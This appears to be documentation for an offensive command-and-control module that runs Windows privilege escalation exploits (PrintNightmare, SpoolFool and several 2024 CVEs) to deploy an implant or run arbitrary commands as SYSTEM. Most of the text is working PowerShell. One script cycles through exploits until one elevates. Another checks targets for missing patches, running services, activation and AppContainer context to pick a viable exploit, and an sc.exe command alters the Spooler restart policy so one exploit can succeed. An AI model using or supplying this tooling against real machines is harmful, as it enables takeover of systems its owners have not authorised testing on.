Description
Runs a Windows privilege escalation technique by CVE or technique name and reports whether the vulnerability check passed and execution succeeded.
Overview
Invokes a validated Windows privilege escalation technique from the LevelUp library against the current session. Each technique first runs a Check() phase to confirm the target is vulnerable, then either deploys a SpecterInsight agent payload (Elevation parameter set) or executes an arbitrary command as SYSTEM (Command parameter set).
Only techniques that have passed end-to-end integration testing are listed.
Parameter Sets
Elevation (default)
Deploys the current SpecterInsight implant to the target system as SYSTEM. No -Command argument is needed. Optionally accepts -DllPath to inject a specific DLL directly via the technique escalation path instead of deploying the standard implant.
Command
Runs an arbitrary command as SYSTEM via the chosen technique’s escalation path. -Command is mandatory in this set.
Arguments
| Parameter | Type | Set | Mandatory | Description |
|---|---|---|---|---|
| Technique | string | Both | Yes | The validated privilege escalation technique to invoke. |
| BuildId | string | Elevation | No | Build ID of the SpecterInsight payload to deploy. Defaults to the current session build. |
| DllPath | string | Elevation | No | Path on the target to a DLL to inject directly via the technique escalation path. Defaults to a randomly generated path in C:\Users\Public. Supported by CVE-2021-34527, CVE-2022-21999, CVE-2023-21746, CVE-2024-21447. |
| Command | string | Command | Yes | Arbitrary command to execute as SYSTEM. |
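A typical way to drive the two parameter sets from a session, shown as an added example (this is not code from the SpecterInsight or LevelUp projects). The page does not give the cmdlet's name, so Invoke-LevelUp below is a placeholder to be replaced with the real command, and the wrapper Invoke-FirstWorkingTechnique is defined here. It relies only on the Technique, BuildId and Command parameters and the Technique, CheckPassed and ExecuteSucceeded result fields documented on this page.

```powershell
# Added example, not part of the LevelUp library or the SpecterInsight docs.
# ASSUMPTION: the cmdlet documented on this page is called Invoke-LevelUp below;
# the page does not name it, so substitute the real command name.

function Invoke-FirstWorkingTechnique {
    # Try validated techniques in order and stop at the first one that both
    # passes its Check() phase and executes. Distinguishing the two result
    # fields matters: CheckPassed=false means the host is not vulnerable (or a
    # pre-requisite is missing) and there is nothing to retry, whereas
    # CheckPassed=true with ExecuteSucceeded=false means the technique ran and
    # failed, which usually points at an environmental pre-requisite.
    param(
        [Parameter(Mandatory)][string[]]$Techniques,
        [string]$Command,   # when set, use the Command parameter set
        [string]$BuildId    # Elevation set only; defaults to the session build
    )

    foreach ($t in $Techniques) {
        $splat = @{ Technique = $t }
        if ($Command) { $splat.Command = $Command }
        elseif ($BuildId) { $splat.BuildId = $BuildId }

        $r = Invoke-LevelUp @splat   # placeholder name, see comment above

        if (-not $r.CheckPassed) {
            Write-Host "[-] $t : Check() failed; target not vulnerable or pre-requisite missing, trying next"
            continue
        }
        if (-not $r.ExecuteSucceeded) {
            Write-Host "[!] $t : vulnerable but execution failed; review the per-technique pre-requisites"
            continue
        }
        Write-Host "[+] $t : elevated"
        return $r
    }

    Write-Warning 'No validated technique succeeded on this host'
    return $null
}

# Elevation set: deploy the current implant build as SYSTEM, trying the
# service-based techniques first because they need neither Windows activation
# nor an AppContainer launch context.
Invoke-FirstWorkingTechnique -Techniques 'CVE-2024-26169', 'CVE-2022-21999', 'CVE-2021-34527'

# Command set: run a single command as SYSTEM without staging a second implant.
Invoke-FirstWorkingTechnique -Techniques 'CVE-2024-26169' `
    -Command 'cmd.exe /c whoami > C:\Users\Public\who.txt'
```

The ordering passed to the wrapper is a choice, not a ranking from the page: put techniques whose pre-requisites you have already confirmed first, since every failed Check() still costs a round trip through the implant.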
Validated Techniques
| CVE | Technique |
|---|---|
| CVE-2021-34527 | PrintNightmare – Windows Print Spooler DLL load via AddPrinterDriverEx |
| CVE-2022-21999 | SpoolFool – Print Spooler SpoolDirectory junction swap |
| CVE-2024-21447 | Windows User Manager AccountPicture EoP via junction chain |
| CVE-2024-26169 | Windows Error Reporting Service EoP via WER queue junction swap |
| CVE-2024-49039 | Windows Task Scheduler WPTaskScheduler NCALRPC sandbox escape |
Per-Technique Pre-Requisites
| CVE | Additional Requirement |
|---|---|
| CVE-2021-34527 | Print Spooler must be running. Pre-July 2021 patch (KB5004945/KB5004946/KB5004948 absent). Staging path must be writable. |
| CVE-2022-21999 | Print Spooler must be running with a fast failure-recovery policy (restart delay under 30 s for the first two failure actions). The exploit crashes spoolsv.exe twice and waits 30 s for each restart; against the default Windows policy (restart after 60 s) that wait times out and the technique fails. In a lab, configure with: sc.exe failure Spooler reset= 0 actions= restart/3000/restart/3000/restart/3000 (delays are in milliseconds; changing a service's failure actions requires SERVICE_CHANGE_CONFIG on Spooler, which an unprivileged session normally lacks). |
| CVE-2024-21447 | Windows activation required (UserManager SetAccountPicture returns ChangeDisabled on unactivated targets). |
| CVE-2024-26169 | Windows Error Reporting Service (WerSvc) must be running. |
| CVE-2024-49039 | The technique can be invoked from any integrity level, but the elevated session will not call back unless it is launched from an AppContainer context, since this technique is a sandbox escape. |
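The pre-requisites in the table above can be verified on the target before a technique is invoked, so that a Check() phase that is bound to fail is skipped. The following PowerShell is an added example and is not part of LevelUp or the SpecterInsight documentation; it uses only built-in Windows tooling (Get-Service, sc.exe, Get-HotFix, the SoftwareLicensingProduct CIM class and whoami), and the function names are chosen here rather than being LevelUp identifiers.

```powershell
# Added example: host-side pre-flight checks for the per-technique requirements
# listed on this page. Not part of LevelUp or SpecterInsight; it only inspects
# the target with built-in tools. The technique's own Check() remains the
# authority; these tests just avoid invoking one that cannot pass.

function Test-ServiceRunning {
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue
    return ($null -ne $svc -and $svc.Status -eq 'Running')
}

function Test-PathWritable {
    # PrintNightmare needs a writable staging directory; C:\Users\Public is the
    # default location the page gives for -DllPath.
    param([string]$Path = 'C:\Users\Public')
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllBytes($probe, [byte[]](0)); Remove-Item $probe -Force; return $true }
    catch { return $false }
}

function Get-SpoolerRestartDelaysMs {
    # Parse the RESTART delays (milliseconds) out of the Spooler failure policy.
    $text = (& sc.exe qfailure Spooler 2>&1) -join "`n"
    foreach ($m in [regex]::Matches($text, 'RESTART\s*--\s*Delay\s*=\s*(\d+)\s*milliseconds')) {
        [int]$m.Groups[1].Value
    }
}

function Test-SpoolFoolRestartPolicy {
    # SpoolFool crashes spoolsv.exe twice and waits 30 s for each restart, so the
    # first two failure actions must both be RESTART with a delay below 30000 ms.
    # The Windows default of 60000 ms fails this test.
    $delays = @(Get-SpoolerRestartDelaysMs)
    return ($delays.Count -ge 2 -and $delays[0] -lt 30000 -and $delays[1] -lt 30000)
}

function Set-SpoolFoolRestartPolicy {
    # Lab use only: ChangeServiceConfig2 needs SERVICE_CHANGE_CONFIG on Spooler,
    # which an unprivileged session normally lacks. Delays are in milliseconds.
    & sc.exe failure Spooler reset= 0 actions= restart/3000/restart/3000/restart/3000 | Out-Null
    return Test-SpoolFoolRestartPolicy
}

function Test-PrintNightmarePatchAbsent {
    # July 2021 out-of-band fixes. Get-HotFix reads Win32_QuickFixEngineering and
    # can miss a superseding cumulative update, so "absent" is necessary, not
    # sufficient, for the technique to apply.
    $fixes = 'KB5004945', 'KB5004946', 'KB5004948'
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue | ForEach-Object HotFixID)
    foreach ($kb in $fixes) { if ($installed -contains $kb) { return $false } }
    return $true
}

function Test-WindowsActivated {
    # UserManager SetAccountPicture returns ChangeDisabled on unactivated hosts.
    # LicenseStatus 1 == Licensed; the ApplicationId is the Windows OS family
    # (Office products share this CIM class and are excluded by the filter).
    $lic = Get-CimInstance -ClassName SoftwareLicensingProduct `
        -Filter "PartialProductKey IS NOT NULL AND ApplicationId = '55c92734-d682-4d71-983e-d6ec3f16059f'" `
        -ErrorAction SilentlyContinue
    return [bool]($lic | Where-Object LicenseStatus -eq 1)
}

function Get-TokenContext {
    # Integrity level and AppContainer membership of the current token. An
    # AppContainer token carries the ALL APPLICATION PACKAGES group.
    $groups = (& whoami.exe /groups) -join "`n"
    [pscustomobject]@{
        IntegrityLevel = if ($groups -match 'Mandatory Label\\(\w+) Mandatory Level') { $Matches[1] } else { 'Unknown' }
        AppContainer   = ($groups -match 'ALL APPLICATION PACKAGES')
    }
}

function Test-TechniquePrerequisites {
    param([Parameter(Mandatory)][string]$Technique)
    switch ($Technique) {
        'CVE-2021-34527' { (Test-ServiceRunning Spooler) -and (Test-PrintNightmarePatchAbsent) -and (Test-PathWritable) }
        'CVE-2022-21999' { (Test-ServiceRunning Spooler) -and (Test-SpoolFoolRestartPolicy) }
        'CVE-2024-21447' { Test-WindowsActivated }
        'CVE-2024-26169' { Test-ServiceRunning WerSvc }
        'CVE-2024-49039' { (Get-TokenContext).AppContainer }   # needed for the elevated session to call back
        default          { throw "Unknown technique: $Technique" }
    }
}

# Usage: summarise which validated techniques look viable on this host.
'CVE-2021-34527', 'CVE-2022-21999', 'CVE-2024-21447', 'CVE-2024-26169', 'CVE-2024-49039' |
    ForEach-Object { [pscustomobject]@{ Technique = $_; PrereqsMet = Test-TechniquePrerequisites $_ } } |
    Format-Table -AutoSize
```

Test-PrintNightmarePatchAbsent deliberately errs toward reporting a host as patchable-but-unconfirmed: a cumulative update that supersedes the three July 2021 KBs will not show up under those IDs, so a True result here still needs the technique's Check() to agree.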
Dependencies
- levelup
Operating Systems
- Windows
Example Output
Name Value
---- -----
Technique CVE-2024-26169
CheckPassed True
ExecuteSucceeded True
{
"Technique": "CVE-2024-26169",
"CheckPassed": true,
"ExecuteSucceeded": true
}
